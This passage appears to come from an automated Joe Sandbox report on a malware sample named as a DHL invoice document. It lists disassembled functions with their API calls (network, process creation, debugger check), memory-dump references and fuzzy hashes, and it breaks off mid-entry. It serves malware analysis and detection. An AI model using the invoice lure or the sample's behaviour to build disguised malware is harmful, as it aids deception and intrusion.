                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0033600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0033604C
                                                                                                                          • Part of subcall function 0033600E: GetStockObject.GDI32(00000011), ref: 00336060
                                                                                                                          • Part of subcall function 0033600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0033606A
                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 003C377A
                                                                                                                        • GetSysColor.USER32(00000012), ref: 003C3794
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                        • String ID: static
                                                                                                                        • API String ID: 1983116058-2160076837
                                                                                                                        • Opcode ID: d32068b7eb71e5e9682f38639bbfbd7675cca40a5df86f5e2c1ee6e8aa3ea416
                                                                                                                        • Instruction ID: fd3f893cb346b5edf44789615b399d28565b99f52191c968c39f8e5ab992ec97
                                                                                                                        • Opcode Fuzzy Hash: d32068b7eb71e5e9682f38639bbfbd7675cca40a5df86f5e2c1ee6e8aa3ea416
                                                                                                                        • Instruction Fuzzy Hash: E7113AB2610209AFDF02DFA8CC46EEA7BF8FB09314F015518F955E2250D735ED519B50
                                                                                                                        Function 003C6181 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 003C61FC
                                                                                                                        • SendMessageW.USER32(?,00000194,00000000,00000000), ref: 003C6225
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend
                                                                                                                        • String ID: xV
                                                                                                                        • API String ID: 3850602802-2513823414
                                                                                                                        • Opcode ID: 63c561d6ee4a47d80c40049d0411c5bc503b49c558fcf229faeff5c40f03f5e3
                                                                                                                        • Instruction ID: 2ff91eb132724eb17d84c16d6c43b7abcd74563050b6ac7480f1a307053b0d03
                                                                                                                        • Opcode Fuzzy Hash: 63c561d6ee4a47d80c40049d0411c5bc503b49c558fcf229faeff5c40f03f5e3
                                                                                                                        • Instruction Fuzzy Hash: B311C171144218BEEB128F68CD1BFBA3BA8EB09311F054519FA16EA1E1D2B1EE10DB50
                                                                                                                        Function 003ACD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 003ACD7D
                                                                                                                        • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 003ACDA6
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Internet$OpenOption
                                                                                                                        • String ID: <local>
                                                                                                                        • API String ID: 942729171-4266983199
                                                                                                                        • Opcode ID: 6ad34f51750db7a8759919cdb8d0fd5082002a6e68a503ec0687e799d7c8cf08
                                                                                                                        • Instruction ID: cc53262a50907b1ce237b1873a03db62a2566ae9d5006443c45bd8a831f216ef
                                                                                                                        • Opcode Fuzzy Hash: 6ad34f51750db7a8759919cdb8d0fd5082002a6e68a503ec0687e799d7c8cf08
                                                                                                                        • Instruction Fuzzy Hash: B511C271225635BAD73A4B668C49EF7BEACEF137A4F00522AF11983580D7709840D6F0
                                                                                                                        Function 003C3429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetWindowTextLengthW.USER32(00000000), ref: 003C34AB
                                                                                                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 003C34BA
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LengthMessageSendTextWindow
                                                                                                                        • String ID: edit
                                                                                                                        • API String ID: 2978978980-2167791130
                                                                                                                        • Opcode ID: 0ed42766979bd3b4ef556b64e2a387b54fdf9e983ba4b93e84c44aec53b53161
                                                                                                                        • Instruction ID: d740fc2069bc19ed050203526647bee8a79637d8cfbb0f2e3a9af368e266de48
                                                                                                                        • Opcode Fuzzy Hash: 0ed42766979bd3b4ef556b64e2a387b54fdf9e983ba4b93e84c44aec53b53161
                                                                                                                        • Instruction Fuzzy Hash: D6118871100208AAEB178E65DC80FAA36AAEB05374F518328F964D71E0C731ED519B60
                                                                                                                        Function 003C4F80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,?,?,?), ref: 003C4FCC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend
                                                                                                                        • String ID: xV
                                                                                                                        • API String ID: 3850602802-2513823414
                                                                                                                        • Opcode ID: 2c4207c02b14d03800a1f0d3e9125c3c36cdbe0f37d5f25c3262aeb6c3980f67
                                                                                                                        • Instruction ID: a1589c5edaada29c2e5f4355a65f2c4a0e7697c5aa85278656864307d53b0efb
                                                                                                                        • Opcode Fuzzy Hash: 2c4207c02b14d03800a1f0d3e9125c3c36cdbe0f37d5f25c3262aeb6c3980f67
                                                                                                                        • Instruction Fuzzy Hash: 5121D37661011AEFCB16CFA8C950DEABBB9FB4D340B014158F905E7320D631ED61EB90
                                                                                                                        Function 00396C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00339CB3: _wcslen.LIBCMT ref: 00339CBD
                                                                                                                        • CharUpperBuffW.USER32(?,?,?), ref: 00396CB6
                                                                                                                        • _wcslen.LIBCMT ref: 00396CC2
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen$BuffCharUpper
                                                                                                                        • String ID: STOP
                                                                                                                        • API String ID: 1256254125-2411985666
                                                                                                                        • Opcode ID: 4d8f2e3a3c7b28649c0b9b00790c3daf083edf38da97d538c3f3d646593c3bf8
                                                                                                                        • Instruction ID: 2a5fab5ca46b2eebd9bf4bb33ce96071ff2b4ddca5e5d59f8add7efffe7d9d29
                                                                                                                        • Opcode Fuzzy Hash: 4d8f2e3a3c7b28649c0b9b00790c3daf083edf38da97d538c3f3d646593c3bf8
                                                                                                                        • Instruction Fuzzy Hash: D40104326119268ACF239FBDDC829BF37A8EA60710B020534F86296194EB31E800CA50
                                                                                                                        Function 003490DF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: xV
                                                                                                                        • API String ID: 0-2513823414
                                                                                                                        • Opcode ID: f2472cb94954077576ecd425a3d58eb1ffff3b9cbb78dcde032f93187900bfb0
                                                                                                                        • Instruction ID: 0e17a6c512b811d1f35fe7e584e2b839ce23c97cd2a4d813180e3b6642327253
                                                                                                                        • Opcode Fuzzy Hash: f2472cb94954077576ecd425a3d58eb1ffff3b9cbb78dcde032f93187900bfb0
                                                                                                                        • Instruction Fuzzy Hash: 22113D75604704AFCB21DF18D850EA5B7E6FB89320F258259F9259B2A0C771F941CF90
                                                                                                                        Function 00391BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00339CB3: _wcslen.LIBCMT ref: 00339CBD
                                                                                                                          • Part of subcall function 00393CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00393CCA
                                                                                                                        • SendMessageW.USER32(?,00000180,00000000,?), ref: 00391C46
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ClassMessageNameSend_wcslen
                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                        • API String ID: 624084870-1403004172
                                                                                                                        • Opcode ID: 084e512d1cb449e771f2fa0d45c9a18b3d2ef7db145f1361b8ed2ff391a42947
                                                                                                                        • Instruction ID: 09ee02cf6a8c71d5b6c87e37047de10a89b8335ee6e52722fdecf847240d3207
                                                                                                                        • Opcode Fuzzy Hash: 084e512d1cb449e771f2fa0d45c9a18b3d2ef7db145f1361b8ed2ff391a42947
                                                                                                                        • Instruction Fuzzy Hash: 1D01A775685109A6DF07EB90CA91EFF77AC9F51340F14001AF5167B281EA609E08CAB1
                                                                                                                        Function 0034A4D6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __Init_thread_footer.LIBCMT ref: 0034A529
                                                                                                                          • Part of subcall function 00339CB3: _wcslen.LIBCMT ref: 00339CBD
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Init_thread_footer_wcslen
                                                                                                                        • String ID: ,%@$3y8
                                                                                                                        • API String ID: 2551934079-1164007899
                                                                                                                        • Opcode ID: ec8bab402d0757081e394135bbaaf566d43519f2a0a56730275b7d77f3e40e37
                                                                                                                        • Instruction ID: 53d87b3b6a72626cd2b77488f65d326774462e4c210e1e0b0dbcf4850e75cc4f
                                                                                                                        • Opcode Fuzzy Hash: ec8bab402d0757081e394135bbaaf566d43519f2a0a56730275b7d77f3e40e37
                                                                                                                        • Instruction Fuzzy Hash: D6012B31780A1097C517F768EE5BFAD33949B06711F4040AAF9056F2D3DEA0BD45869B
                                                                                                                        Function 003C90A1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00349BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00349BB2
                                                                                                                        • DefDlgProcW.USER32(?,0000002B,?,?,?,?,?,?,?,0038769C,?,?,?), ref: 003C9111
                                                                                                                          • Part of subcall function 00349944: GetWindowLongW.USER32(?,000000EB), ref: 00349952
                                                                                                                        • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 003C90F7
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LongWindow$MessageProcSend
                                                                                                                        • String ID: xV
                                                                                                                        • API String ID: 982171247-2513823414
                                                                                                                        • Opcode ID: 27302c3421f4e03a2e093d13bd8d1ab710c84d7f8195f4e30156c56f5c079ad9
                                                                                                                        • Instruction ID: 12a1ec29c643e9f0368e69a87fa6bb697f044b6f3c399f7fb583ab29479a6a50
                                                                                                                        • Opcode Fuzzy Hash: 27302c3421f4e03a2e093d13bd8d1ab710c84d7f8195f4e30156c56f5c079ad9
                                                                                                                        • Instruction Fuzzy Hash: BF01DF31100214ABDB229F14DC4EFA67BAAFF86765F15006EF9559B2E1CB336C51CB50
                                                                                                                        Function 003C8172 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40processCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00403018,0040305C), ref: 003C81BF
                                                                                                                        • CloseHandle.KERNEL32 ref: 003C81D1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseCreateHandleProcess
                                                                                                                        • String ID: \0@
                                                                                                                        • API String ID: 3712363035-863861157
                                                                                                                        • Opcode ID: 1ae6b5179de2cedf9dba8f5847400b2fc0d601d98ff4f1d45836bd2edaad1326
                                                                                                                        • Instruction ID: 685b577d86eb8b36efed367b18521faffc18f8adfa3467cb522af22990d96b7a
                                                                                                                        • Opcode Fuzzy Hash: 1ae6b5179de2cedf9dba8f5847400b2fc0d601d98ff4f1d45836bd2edaad1326
                                                                                                                        • Instruction Fuzzy Hash: 2FF03AB5641300BAE2216F61AC49FB73E5CEB06752F008471BA08E91A2D67A9E0483E8
                                                                                                                        Function 003B747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen
                                                                                                                        • String ID: 3, 3, 16, 1
                                                                                                                        • API String ID: 176396367-3042988571
                                                                                                                        • Opcode ID: d6f77451893602de22780862506e603e51c5b8af3f41718c4d14c6d4e9abb57d
                                                                                                                        • Instruction ID: 6707a5156badb25daf1692c6346c170a9b8aeb9f7a312435638e17aa4c72f315
                                                                                                                        • Opcode Fuzzy Hash: d6f77451893602de22780862506e603e51c5b8af3f41718c4d14c6d4e9abb57d
                                                                                                                        • Instruction Fuzzy Hash: FAE02B06608220209237127B9CC6DFF5689CFC5756710182BFE81C6276EB948DD193E0
                                                                                                                        Function 00390B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00390B23
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Message
                                                                                                                        • String ID: AutoIt$Error allocating memory.
                                                                                                                        • API String ID: 2030045667-4017498283
                                                                                                                        • Opcode ID: 27e636da358678c41d42f4fb10f9e9423442bdeea5b800c47c0f72efba6c954b
                                                                                                                        • Instruction ID: 0762136c92a177fafb23beeb5db5d13c48f0bd6b25d1ca3d8c18721c21b22528
                                                                                                                        • Opcode Fuzzy Hash: 27e636da358678c41d42f4fb10f9e9423442bdeea5b800c47c0f72efba6c954b
                                                                                                                        • Instruction Fuzzy Hash: A0E0D8312443083ED21B36947C43FC97AC48F05B11F14442AFB8C9D4D38BE1789047A9
                                                                                                                        Function 00350D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0034F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00350D71,?,?,?,0033100A), ref: 0034F7CE
                                                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,0033100A), ref: 00350D75
                                                                                                                        • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0033100A), ref: 00350D84
                                                                                                                        Strings
                                                                                                                        • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00350D7F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                                                        • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                        • API String ID: 55579361-631824599
                                                                                                                        • Opcode ID: 20ea3b815226ca240a4891a37145b8d4c2babe2c26b4ce4c06b11a30787ca306
                                                                                                                        • Instruction ID: a7769486690d2e9fdc078ed1d81599a9e5c73caeabcc7fd4c48a33a9349c9e9f
                                                                                                                        • Opcode Fuzzy Hash: 20ea3b815226ca240a4891a37145b8d4c2babe2c26b4ce4c06b11a30787ca306
                                                                                                                        • Instruction Fuzzy Hash: B8E092742003418FD7369FB8D544B827BF4AF00741F044D2DE886CA661DBB6F8488B91
                                                                                                                        Function 0034E398 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __Init_thread_footer.LIBCMT ref: 0034E3D5
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Init_thread_footer
                                                                                                                        • String ID: 0%@$8%@
                                                                                                                        • API String ID: 1385522511-2711268310
                                                                                                                        • Opcode ID: 79d36dcca685fd563fce98412caf7460a083411f35536b6dd03d47a7ec1e992c
                                                                                                                        • Instruction ID: 7c91f3662d1fbad59474b8ca6ccb2ccac7df5af1a5fba31d525e1fb5f02760f1
                                                                                                                        • Opcode Fuzzy Hash: 79d36dcca685fd563fce98412caf7460a083411f35536b6dd03d47a7ec1e992c
                                                                                                                        • Instruction Fuzzy Hash: 03E08639414910EBC60B9B18BF5DE8A3395FB05320F9151B5F512AF1E29BB53841865D
                                                                                                                        Function 0038D21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
